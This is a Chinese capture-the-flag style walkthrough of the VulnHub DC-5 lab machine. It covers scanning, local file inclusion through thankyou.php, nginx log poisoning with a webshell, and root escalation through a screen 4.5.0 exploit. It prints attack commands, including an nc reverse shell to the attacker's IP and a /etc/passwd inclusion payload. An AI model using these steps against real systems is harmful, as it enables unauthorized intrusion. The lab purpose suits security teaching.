【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

admin 2025年4月10日21:49:40评论2 views字数 2018阅读6分43秒阅读模式

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

靶场搭建

从官网直接用迅雷下载就会快一点:https://www.vulnhub.com/entry/dc-5,314/ 用vm直接打开ova文件即可,要注意一下靶机和攻击机(kali)要在同一个局域网内哦!!!

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

信息收集

主机收集

arp-scan -l

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透靶场的ip为192.168.2.138

端口收集

nmap全端口扫描nmap -sS -P 1-65536 -v 192.168.2.138

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透开放的端口有80、111、43274

目录扫描

dirb

dirb http://192.168.2.138【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透虽然没看到敏感的目录,但是有时候dirb工具扫不出来,所以我们用御剑再扫一下

御剑

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透也可以用disreach

disreach

dirsearch -u http://192.168.2.138

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

指纹识别

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透发现nginx的版本是nginx 1.6.2

网站信息收集

whatweb -v http://192.168.2.138

没有发现什么有用的网址的信息【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

信息收集总结

ip地址:192.168.2.138 开放的端口:80、111、43274 目录:/contact.php             /thankyou.php            /faq.php             /footer.php  版本:nginx1.6.2    

漏洞利用

端口的利用

80端口

开放了80端口,我们可以去访问它的网址,看看有没有什么信息

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透发现有很多功能区,到处逛逛看看有没有什么信息

目录利用

/contact.php

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透试一下看看有没有存在xss漏洞

<script>alert('xss漏洞')</script>

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

/thankyou.php

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透虽然没有存在xss漏洞,但是我们发现提交之后最下面的时间从2019变成2018,每提交一次就变,此时的url:/thankyou.php

/faq.php

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透fap.php反复刷新,发现下面的时间没有变化

/footer.php

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透发现footer.php是前面两个网站最下面的一个功能,反复刷新发现时间也是变的,说明在thankyyou.php页面上存在文件包含footer.php,当contact.php页面填入数据时提交到thankyou.php页面

文件包含

我们验证一下是否存在文件包含漏洞/thankyou.php?file=/etc/passwd

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透没有发现可以登录的,我们只能试试传入一句话木马连接得到shell这个思路啦

bp抓包

bp上传一句话木马

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

检验一下是否上传成功

看一下日志的信息,通过前面的网址信息收集,是nginx1.6.2版本的,所以它的日志会记录在下面的路径上?file=/var/log/nginx/error.log

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透) 在响应的日志信息中我们可以看到确实能看到木马,说明上传成功了。

蚁剑连接

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透打开终端查看一下当前用户的权限,发现只是普通的用户,很多文件的权限都是要root超级用户,所以我们正向提权行不通,还是一样,反弹shell提权

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

反弹shell

kali攻击机开启监听

我习惯用nc反弹shellnc -lvvp 7777

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

靶机反弹

nc -e /bin/bash 192.168.2.129 7777192.168.2.129是攻击机kali的ip

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

连接成功

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

进入交互式

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

只能看一些目录,进入home发现存在一个dc文件,但是没有权限看,是root或者dc用户才能查看

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

suid权限的文件

查看一下那些文件具有suid权限的文件find / -perm -u=s -type f 2>/dev/null

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透发现有两个不寻常得到文件,得到一个screen 4.5.0,查找一下和这个有关的漏洞,看看能不能利用一些脚本提权

寻找漏洞

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透发现有一个脚本和txt文件

txt文件

先下载到kali上,发现文件里面有screen提权的步骤,我们直接根据步骤提权

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透
【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

提权成功到root

脚本漏洞

我们先下载到kali上,再开启http服务上传到靶机上,看看能不能运行该脚本提权成功

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透
【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透
【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透上传成功! 执行脚本,发现一开始没有权限,所以执行不了该脚本,所以我们先给文件简单的授权,再运行该脚本

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透运行成功,成功得到root用户的权限,直接进入root目录找flag啦

【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

成功得到flag!!

更多靶场信息感兴趣的师傅可以关注微信 公众号【Cauchy网安】,一起一步步慢慢来,该到达的高度终将会抵达的,加油,如有雷同纯属巧合.点点关注吧师傅
参考文章:https://blog.csdn.net/qq_34028816/article/details/124572718?fromshare=blogdetail&sharetype=blogdetail&sharerId=124572718&sharerefer=PC&sharesource=2301_77091612&sharefrom=from_link

原文始发于微信公众号(Cauchy网安):【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月10日21:49:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【VulnHub靶场】DC-5文件包含上传木马之screen提权渗透https://cn-sec.com/archives/3909082.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息